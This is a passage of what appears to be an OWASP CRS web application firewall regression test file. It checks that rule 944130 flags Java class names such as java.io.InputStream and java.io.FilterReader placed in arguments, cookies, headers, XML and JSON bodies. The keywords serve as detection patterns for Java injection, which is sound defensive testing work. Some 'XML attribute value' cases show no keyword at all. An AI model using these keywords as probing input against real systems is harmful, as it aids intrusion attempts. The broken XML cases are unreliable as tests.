Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Cookie name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML attribute value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-134 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "Request header test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-172 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + 